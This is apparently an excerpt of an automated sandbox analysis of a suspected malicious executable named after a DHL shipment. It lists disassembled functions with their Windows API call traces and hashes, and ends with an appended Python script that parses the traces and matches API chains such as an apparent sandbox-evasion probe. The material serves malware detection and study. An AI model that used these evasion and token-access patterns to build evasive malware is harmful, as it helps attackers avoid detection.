                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3970641297-0
                                                                                            • Opcode ID: 26d39531759b77d9d333f1bee6eec00df3e5518e5f18e59206786369ea384e3a
                                                                                            • Instruction ID: 044f76c538e66f8eaba2bfefdc8af2fe6dc387fa5ded41b29b9084f5e7d20536
                                                                                            • Opcode Fuzzy Hash: 26d39531759b77d9d333f1bee6eec00df3e5518e5f18e59206786369ea384e3a
                                                                                            • Instruction Fuzzy Hash: 6E116172501958FFEF124FA49C44EEA7BA9FF19364F040215FA14A6110D732DCA0EBA0
                                                                                            APIs
                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00843B56
                                                                                              • Part of subcall function 00843AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00843AD2
                                                                                              • Part of subcall function 00843AA3: ___AdjustPointer.LIBCMT ref: 00843AED
                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00843B6B
                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00843B7C
                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00843BA4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                            • String ID:
                                                                                            • API String ID: 737400349-0
                                                                                            • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                            • Instruction ID: 860cd67bcc5fc6585e1d4e2c4904b6b6bce57210da7ee3a1e43f6df3d89cc469
                                                                                            • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                            • Instruction Fuzzy Hash: B001E93210014DBBDF12AE99CC46EEB7B69FF58764F044115FE48A6121C732E961DBA1
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008213C6,00000000,00000000,?,0085301A,008213C6,00000000,00000000,00000000,?,0085328B,00000006,FlsSetValue), ref: 008530A5
                                                                                            • GetLastError.KERNEL32(?,0085301A,008213C6,00000000,00000000,00000000,?,0085328B,00000006,FlsSetValue,008C2290,FlsSetValue,00000000,00000364,?,00852E46), ref: 008530B1
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0085301A,008213C6,00000000,00000000,00000000,?,0085328B,00000006,FlsSetValue,008C2290,FlsSetValue,00000000), ref: 008530BF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 3177248105-0
                                                                                            • Opcode ID: 7b20dc23ba3f385e532265bc2c970157633bbcb11ea9f436dec75cdcdd90adea
                                                                                            • Instruction ID: 1322da0947390009349a36dd96e96f18841a668422d916e13e1a53011e3d84f2
                                                                                            • Opcode Fuzzy Hash: 7b20dc23ba3f385e532265bc2c970157633bbcb11ea9f436dec75cdcdd90adea
                                                                                            • Instruction Fuzzy Hash: 74018432751B26ABCB214A799C849677B99FF45BE2B210724FD05E71C0D721D909C6E0
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0088747F
                                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00887497
                                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008874AC
                                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 008874CA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                                            • String ID:
                                                                                            • API String ID: 1352324309-0
                                                                                            • Opcode ID: 9e7bf33b500f9dc702a81be73425cfdae2fb16926efa0438f37d90f1f3ab969f
                                                                                            • Instruction ID: b7327ca3633220f036a05555d1f1da4b26d269041434b7ec46660e07fcc3dff2
                                                                                            • Opcode Fuzzy Hash: 9e7bf33b500f9dc702a81be73425cfdae2fb16926efa0438f37d90f1f3ab969f
                                                                                            • Instruction Fuzzy Hash: 9411ADB1209315ABE720AF54DC08B927FFCFF00B14F208569E656D6191D7B0E944DBA4
                                                                                            APIs
                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0088ACD3,?,00008000), ref: 0088B0C4
                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0088ACD3,?,00008000), ref: 0088B0E9
                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0088ACD3,?,00008000), ref: 0088B0F3
                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0088ACD3,?,00008000), ref: 0088B126
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                            • String ID:
                                                                                            • API String ID: 2875609808-0
                                                                                            • Opcode ID: 051665dcca04c66cee9c1c5ce72e3ffd3111768e82dfbd6c4f32b35773cb8cb4
                                                                                            • Instruction ID: 609aff478b10aba4bec14e7e1390e32739eca56db7753879d6f9f031639ffda3
                                                                                            • Opcode Fuzzy Hash: 051665dcca04c66cee9c1c5ce72e3ffd3111768e82dfbd6c4f32b35773cb8cb4
                                                                                            • Instruction Fuzzy Hash: 7F113931C0192DE7CF00EFE8E9986EEBF78FF89711F104186D981B6281DB3056508B51
                                                                                            APIs
                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00882DC5
                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00882DD6
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00882DDD
                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00882DE4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2710830443-0
                                                                                            • Opcode ID: 6fd7045cda70b09ac0a0288c31e4913af639515124c8ededa2dab17973dae85d
                                                                                            • Instruction ID: d361ba70ac15ac93601e966b30fb5d8830e8b7c083019c1c8ce420bcef561c84
                                                                                            • Opcode Fuzzy Hash: 6fd7045cda70b09ac0a0288c31e4913af639515124c8ededa2dab17973dae85d
                                                                                            • Instruction Fuzzy Hash: A2E0EDB25012287BD7202B669C0DEEB7F6CFB57BA1F400219B506D10919AA58941C6B0
                                                                                            APIs
                                                                                              • Part of subcall function 00839639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00839693
                                                                                              • Part of subcall function 00839639: SelectObject.GDI32(?,00000000), ref: 008396A2
                                                                                              • Part of subcall function 00839639: BeginPath.GDI32(?), ref: 008396B9
                                                                                              • Part of subcall function 00839639: SelectObject.GDI32(?,00000000), ref: 008396E2
                                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 008B8887
                                                                                            • LineTo.GDI32(?,?,?), ref: 008B8894
                                                                                            • EndPath.GDI32(?), ref: 008B88A4
                                                                                            • StrokePath.GDI32(?), ref: 008B88B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                            • String ID:
                                                                                            • API String ID: 1539411459-0
                                                                                            • Opcode ID: 7663632c4b0b43b123d9bad2bf50b5c332040f116acbae2794b2d2b489af7072
                                                                                            • Instruction ID: 92efc95ddd744e6afab2e0e25ed55151570635d51c199f6074829b0d8b6e77e6
                                                                                            • Opcode Fuzzy Hash: 7663632c4b0b43b123d9bad2bf50b5c332040f116acbae2794b2d2b489af7072
                                                                                            • Instruction Fuzzy Hash: DEF03A36141659FBDB126F94AC0EFDA3F59BF06310F448100FA11A51E1C7B55511CFE5
                                                                                            APIs
                                                                                            • GetSysColor.USER32(00000008), ref: 008398CC
                                                                                            • SetTextColor.GDI32(?,?), ref: 008398D6
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 008398E9
                                                                                            • GetStockObject.GDI32(00000005), ref: 008398F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ModeObjectStockText
                                                                                            • String ID:
                                                                                            • API String ID: 4037423528-0
                                                                                            • Opcode ID: 40cf4a48327574a5e7272b0ec94a61dfadfbb7f5a126ff54433dc8cd3673e794
                                                                                            • Instruction ID: b9d149f774861eaeaf2527dd6ae772b7d7b0e89d649a3fe498e4a51d5c65e666
                                                                                            • Opcode Fuzzy Hash: 40cf4a48327574a5e7272b0ec94a61dfadfbb7f5a126ff54433dc8cd3673e794
                                                                                            • Instruction Fuzzy Hash: 02E06D31244280AADB215B78AC09BE93F20FB52336F04C319F6FAA80E1C3718640DB20
                                                                                            APIs
                                                                                            • GetCurrentThread.KERNEL32 ref: 00881634
                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,008811D9), ref: 0088163B
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008811D9), ref: 00881648
                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,008811D9), ref: 0088164F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                                            • String ID:
                                                                                            • API String ID: 3974789173-0
                                                                                            • Opcode ID: 2977b8db703198e78700062753922ac5c5c06f9e25b41bba212767aa0d8df92c
                                                                                            • Instruction ID: 7ba43fa20a4ee167c5dc9162f8538170d7f2f7582e1c3f5935dea156faf6f958
                                                                                            • Opcode Fuzzy Hash: 2977b8db703198e78700062753922ac5c5c06f9e25b41bba212767aa0d8df92c
                                                                                            • Instruction Fuzzy Hash: 56E08631641211DBDB202FA19D0DB863B7CFF58791F184918F285C9080EA344442C760
                                                                                            APIs
                                                                                            • GetDesktopWindow.USER32 ref: 0087D858
                                                                                            • GetDC.USER32(00000000), ref: 0087D862
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0087D882
                                                                                            • ReleaseDC.USER32(?), ref: 0087D8A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2889604237-0
                                                                                            • Opcode ID: 9274509d0aad12867ae37c70cd8a5baae0b3a5cc5f99c7165bea72d27ca4f33e
                                                                                            • Instruction ID: 5f7f0978f0d4d4b2bdd2c2533df45ff02f3df16d141c0e15d43f5cf634ea82ca
                                                                                            • Opcode Fuzzy Hash: 9274509d0aad12867ae37c70cd8a5baae0b3a5cc5f99c7165bea72d27ca4f33e
                                                                                            • Instruction Fuzzy Hash: B3E01AB4C00208DFCB41AFA4D908A6DBBB1FB58310F148519E806E7250CB389941AF51
                                                                                            APIs
                                                                                            • GetDesktopWindow.USER32 ref: 0087D86C
                                                                                            • GetDC.USER32(00000000), ref: 0087D876
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0087D882
                                                                                            • ReleaseDC.USER32(?), ref: 0087D8A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2889604237-0
                                                                                            • Opcode ID: a5d6fa7bed626dee6bbe1e5290fa5fddfab0ad1616288231c126edc1b0c5c4d9
                                                                                            • Instruction ID: d059abfb91f278682e2b2024eddf8d657eb4660df3a84e52821db69ceaa0c554
                                                                                            • Opcode Fuzzy Hash: a5d6fa7bed626dee6bbe1e5290fa5fddfab0ad1616288231c126edc1b0c5c4d9
                                                                                            • Instruction Fuzzy Hash: 21E046B4C00204EFCF50AFA8E80CA6DBBB1FB58310F108508F80AE7350CB385902AF90
                                                                                            APIs
                                                                                              • Part of subcall function 00827620: _wcslen.LIBCMT ref: 00827625
                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00894ED4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Connection_wcslen
                                                                                            • String ID: *$LPT
                                                                                            • API String ID: 1725874428-3443410124
                                                                                            • Opcode ID: f4fe6de02cdd866d4d179ff1e3a089cc4e2578bb9085973d2aa96498018e52b4
                                                                                            • Instruction ID: ff051cf834ca83092635cbb66bcb63e3dfdd7ec33990f6433db964b005e7955b
                                                                                            • Opcode Fuzzy Hash: f4fe6de02cdd866d4d179ff1e3a089cc4e2578bb9085973d2aa96498018e52b4
                                                                                            • Instruction Fuzzy Hash: 0C915F75A002159FCB14EF58C484EAABBF1FF44318F189099E40A9F762DB35ED86CB91
                                                                                            APIs
                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 0084E30D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorHandling__start
                                                                                            • String ID: pow
                                                                                            • API String ID: 3213639722-2276729525
                                                                                            • Opcode ID: 165107a8b808bb37ebc09034354bdf0a1c5668aa17064c56175bfdc09b7bdff4
                                                                                            • Instruction ID: 3822686646e65efe9cd497dc6973e60107725bc6dde450ba0bdab027b89c5840
                                                                                            • Opcode Fuzzy Hash: 165107a8b808bb37ebc09034354bdf0a1c5668aa17064c56175bfdc09b7bdff4
                                                                                            • Instruction Fuzzy Hash: 97515F71A0C20996CB167B18E9427793BB4FB40B42F30C9A8F8D5C23EDDF358C899646
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #
                                                                                            • API String ID: 0-1885708031
                                                                                            • Opcode ID: ffb453376ca34024ab0f401798603564514e1774f84cfa8bb093e2f4626deea9
                                                                                            • Instruction ID: 3e1cc4ff526ac4d43b4cbf3c442be1c4498bd1ad56367afe2a307c27a8da34b9
                                                                                            • Opcode Fuzzy Hash: ffb453376ca34024ab0f401798603564514e1774f84cfa8bb093e2f4626deea9
                                                                                            • Instruction Fuzzy Hash: CF51233550024ADFDF19DF68C081ABA7BA8FF69310F2480A5F895DB2D4D634DD52CBA1
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000), ref: 0083F2A2
                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0083F2BB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                            • String ID: @
                                                                                            • API String ID: 2783356886-2766056989
                                                                                            • Opcode ID: b1dd33a6173cf0842549aa33d5e092232d98f2f24acc92857fc6a6a6c1e31eae
                                                                                            • Instruction ID: 940ef99dfdc94f00697064833349ce4dcc5ebdbcbcb4a119ff294c63f1d779fd
                                                                                            • Opcode Fuzzy Hash: b1dd33a6173cf0842549aa33d5e092232d98f2f24acc92857fc6a6a6c1e31eae
                                                                                            • Instruction Fuzzy Hash: 57513871418B449BD320AF55E886BAFBBF8FF84300F81885DF19981195EF708969CB67
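The "APIs" bullets in each block above are the sandbox's static per-function call trace, and the Sleep / GlobalMemoryStatusEx pairing in the block just listed is the kind of sequence behind the report's "Found API chain indicative of sandbox detection" signature. As an added example (not part of this report and not Joe Sandbox's own tooling), the Python below parses that bullet format, including the "Part of subcall function" prefix and the "?" placeholders for unresolved arguments, and runs an ordered-subsequence chain rule over each function. The sample input is copied from blocks on this page; the rule names and the two chains in CHAIN_RULES are this example's own assumptions, not the sandbox's signature definitions.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: "APIs" bullets copied from three function blocks of this
# report, with their original bullets and "Part of subcall" prefixes, so the
# parser is exercised on the real layout.
SAMPLE_BLOCKS = {
    "0083F2A2": """
• Sleep.KERNEL32(00000000), ref: 0083F2A2
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0083F2BB
""",
    "00881634": """
• GetCurrentThread.KERNEL32 ref: 00881634
• OpenThreadToken.ADVAPI32(00000000,?,?,?,008811D9), ref: 0088163B
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008811D9), ref: 00881648
• OpenProcessToken.ADVAPI32(00000000,?,?,?,008811D9), ref: 0088164F
""",
    "008B8887": """
  • Part of subcall function 00839639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00839693
  • Part of subcall function 00839639: SelectObject.GDI32(?,00000000), ref: 008396A2
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 008B8887
• LineTo.GDI32(?,?,?), ref: 008B8894
""",
}

# One bullet: [Part of subcall function X:] Api.MODULE[(args)][,] ref: ADDR
_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                        # int for hex literals, None for "?", str if unparsable
    ref: int                          # call-site address from the "ref:" field
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines


def _parse_arg(token: str):
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token


def parse_api_block(text: str) -> list[ApiCall]:
    """Parse the bullets of one function's "APIs" block; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if not raw else [_parse_arg(a) for a in raw.split(",")]
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


# Illustrative chain rules (this example's own assumption, not the sandbox's
# signature logic): an ordered subsequence of API names inside one function.
CHAIN_RULES = {
    "sandbox_memory_probe": ("Sleep", "GlobalMemoryStatusEx"),
    "token_query_thread_then_process": (
        "GetCurrentThread", "OpenThreadToken", "GetCurrentProcess", "OpenProcessToken",
    ),
}


def match_chains(calls: list[ApiCall], rules=CHAIN_RULES, include_subcalls=False) -> list[str]:
    """Return the names of every rule whose sequence appears, in order, in the block."""
    names = [c.api for c in calls if include_subcalls or c.subcall_of is None]
    hits = []
    for rule, seq in rules.items():
        pos = 0
        for name in names:
            if name == seq[pos]:
                pos += 1
                if pos == len(seq):
                    hits.append(rule)
                    break
    return hits


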